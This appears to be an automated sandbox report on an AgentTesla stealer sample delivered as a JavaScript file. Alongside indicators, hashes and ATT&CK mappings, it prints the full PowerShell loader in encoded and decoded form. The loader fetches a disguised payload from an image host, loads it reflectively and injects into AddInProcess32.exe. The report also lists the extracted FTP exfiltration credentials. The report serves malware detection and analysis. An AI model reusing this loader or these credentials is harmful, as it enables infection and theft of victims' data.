agenttesla | 4b00ec7fa5bb5ab25e79bea3342db01444604bb0c83618a474d2f57501db9947

General

Target

comprobante_9887887.js
Size

5KB
MD5

39f9206f83d0141caec19300d528fd57
SHA1

c78e336bd902973b64108eb003aeb0a92e48bf26
SHA256

a09d8c7cd5db2add2d2aba1810a14afb1f602dd81db92e6f4889d93dfaf455f0
SHA512

b4670af49b60cde81064d4971498b84d38f94b35b49b01c97573eb3ed73870cf0afbb0496f174addec58f3ef435cbf78dd4a20a09f930d44196f72142e9a5097
SSDEEP

96:QcbRUp/NhXhqan4JvvommR39pfh24meHBhmeRqmeRdmeRbmeRoBgmeFFcKRUpl9h:z6rxqqpz+D60S

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.fosna.net
Port:
21
Username:
[email protected]
Password:
=A+N^@~c]~#I

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Blocklisted process makes network request 5 IoCs

Processes:

wscript.exepowershell.exe

flow pid process

3 4388 wscript.exe
5 4388 wscript.exe
8 4388 wscript.exe
14 4892 powershell.exe
30 4892 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Control Panel\International\Geo\Nation wscript.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

56 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4892 set thread context of 4684 4892 powershell.exe AddInProcess32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exeAddInProcess32.exe

pid process

1096 powershell.exe
1096 powershell.exe
4892 powershell.exe
4892 powershell.exe
4684 AddInProcess32.exe
4684 AddInProcess32.exe
4684 AddInProcess32.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exeAddInProcess32.exe

description pid process

Token: SeDebugPrivilege 1096 powershell.exe
Token: SeDebugPrivilege 4892 powershell.exe
Token: SeDebugPrivilege 4684 AddInProcess32.exe

flow	pid	process
3	4388	wscript.exe
5	4388	wscript.exe
8	4388	wscript.exe
14	4892	powershell.exe
30	4892	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Control Panel\International\Geo\Nation	wscript.exe

flow	ioc
56	ip-api.com

description	pid	process	target process
PID 4892 set thread context of 4684	4892	powershell.exe	AddInProcess32.exe

pid	process
1096	powershell.exe
1096	powershell.exe
4892	powershell.exe
4892	powershell.exe
4684	AddInProcess32.exe
4684	AddInProcess32.exe
4684	AddInProcess32.exe

description	pid	process
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	4684	AddInProcess32.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

wscript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4388 wrote to memory of 1096	4388	wscript.exe	powershell.exe
PID 4388 wrote to memory of 1096	4388	wscript.exe	powershell.exe
PID 1096 wrote to memory of 4892	1096	powershell.exe	powershell.exe
PID 1096 wrote to memory of 4892	1096	powershell.exe	powershell.exe
PID 4892 wrote to memory of 4684	4892	powershell.exe	AddInProcess32.exe
PID 4892 wrote to memory of 4684	4892	powershell.exe	AddInProcess32.exe
PID 4892 wrote to memory of 4684	4892	powershell.exe	AddInProcess32.exe
PID 4892 wrote to memory of 4684	4892	powershell.exe	AddInProcess32.exe
PID 4892 wrote to memory of 4684	4892	powershell.exe	AddInProcess32.exe
PID 4892 wrote to memory of 4684	4892	powershell.exe	AddInProcess32.exe
PID 4892 wrote to memory of 4684	4892	powershell.exe	AddInProcess32.exe
PID 4892 wrote to memory of 4684	4892	powershell.exe	AddInProcess32.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\comprobante_9887887.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRzaHVmZmxlZExpbmtzID0gJGxpbmtzIHwgR2V0LVJhbmRvbSAtQ291bnQgJGxpbmtzLkxlbmd0aDsgZm9yZWFjaCAoJGxpbmsgaW4gJHNodWZmbGVkTGlua3MpIHsgdHJ5IHsgJGRvd25sb2FkZWREYXRhICs9ICR3ZWJDbGllbnQuRG93bmxvYWREYXRhKCRsaW5rKSB9IGNhdGNoIHsgY29udGludWUgfSB9OyByZXR1cm4gJGRvd25sb2FkZWREYXRhIH07ICRsaW5rcyA9IEAoJ2h0dHBzOi8vdXBsb2FkZGVpbWFnZW5zLmNvbS5ici9pbWFnZXMvMDA0Lzc3My84MTIvb3JpZ2luYWwvanMuanBnPzE3MTM4ODI3NzgnLCAnaHR0cHM6Ly91cGxvYWRkZWltYWdlbnMuY29tLmJyL2ltYWdlcy8wMDQvNzczLzgxMi9vcmlnaW5hbC9qcy5qcGc/MTcxMzg4Mjc3OCcpOyAkaW1hZ2VCeXRlcyA9IERvd25sb2FkRGF0YUZyb21MaW5rcyAkbGlua3M7IGlmICgkaW1hZ2VCeXRlcyAtbmUgJG51bGwpIHsgJGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbWFnZUJ5dGVzKTsgJHN0YXJ0RmxhZyA9ICc8PEJBU0U2NF9TVEFSVD4+JzsgJGVuZEZsYWcgPSAnPDxCQVNFNjRfRU5EPj4nOyAkc3RhcnRJbmRleCA9ICRpbWFnZVRleHQuSW5kZXhPZigkc3RhcnRGbGFnKTsgJGVuZEluZGV4ID0gJGltYWdlVGV4dC5JbmRleE9mKCRlbmRGbGFnKTsgaWYgKCRzdGFydEluZGV4IC1nZSAwIC1hbmQgJGVuZEluZGV4IC1ndCAkc3RhcnRJbmRleCkgeyAkc3RhcnRJbmRleCArPSAkc3RhcnRGbGFnLkxlbmd0aDsgJGJhc2U2NExlbmd0aCA9ICRlbmRJbmRleCAtICRzdGFydEluZGV4OyAkYmFzZTY0Q29tbWFuZCA9ICRpbWFnZVRleHQuU3Vic3RyaW5nKCRzdGFydEluZGV4LCAkYmFzZTY0TGVuZ3RoKTsgJGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGJhc2U2NENvbW1hbmQpOyAkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjb21tYW5kQnl0ZXMpOyAkdHlwZSA9ICRsb2FkZWRBc3NlbWJseS5HZXRUeXBlKCdQUk9KRVRPQVVUT01BQ0FPLlZCLkhvbWUnKTsgJG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dICgndHh0LjQ0NDQ2ZXphYi83Ny4wNi41OS4zMi8vOnB0dGgnICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nICwgJ2Rlc2F0aXZhZG8nLCdBZGRJblByb2Nlc3MzMicsJ2Rlc2F0aXZhZG8nKSl9fQ==';$OWjuxd = (New-Object System.Text.UTF8Encoding).GetString([System.Convert]::FromBase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778', 'https://uploaddeimagens.com.br/images/004/773/812/original/js.jpg?1713882778'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.44446ezab/77.06.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))}}"
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892

C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t3utb3uc.gfd.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1096-19-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmp

Filesize
10.8MB

Download
memory/1096-20-0x0000021E05C60000-0x0000021E05C70000-memory.dmp

Filesize
64KB

Download
memory/1096-21-0x0000021E05C60000-0x0000021E05C70000-memory.dmp

Filesize
64KB

Download
memory/1096-9-0x0000021E05CA0000-0x0000021E05CC2000-memory.dmp

Filesize
136KB

Download
memory/1096-41-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmp

Filesize
10.8MB

Download
memory/4684-44-0x00000000056C0000-0x00000000056D0000-memory.dmp

Filesize
64KB

Download
memory/4684-47-0x0000000006A60000-0x0000000006AF2000-memory.dmp

Filesize
584KB

Download
memory/4684-34-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/4684-50-0x00000000056C0000-0x00000000056D0000-memory.dmp

Filesize
64KB

Download
memory/4684-49-0x0000000074E60000-0x0000000075610000-memory.dmp

Filesize
7.7MB

Download
memory/4684-42-0x0000000074E60000-0x0000000075610000-memory.dmp

Filesize
7.7MB

Download
memory/4684-43-0x0000000005C80000-0x0000000006224000-memory.dmp

Filesize
5.6MB

Download
memory/4684-48-0x0000000006A00000-0x0000000006A0A000-memory.dmp

Filesize
40KB

Download
memory/4684-45-0x00000000056D0000-0x0000000005736000-memory.dmp

Filesize
408KB

Download
memory/4684-46-0x0000000006970000-0x00000000069C0000-memory.dmp

Filesize
320KB

Download
memory/4892-23-0x000002655D620000-0x000002655D630000-memory.dmp

Filesize
64KB

Download
memory/4892-22-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmp

Filesize
10.8MB

Download
memory/4892-37-0x00007FFDC0CE0000-0x00007FFDC17A1000-memory.dmp

Filesize
10.8MB

Download
memory/4892-33-0x0000026520000000-0x00000265202C0000-memory.dmp

Filesize
2.8MB

Download

Analysis

Sharing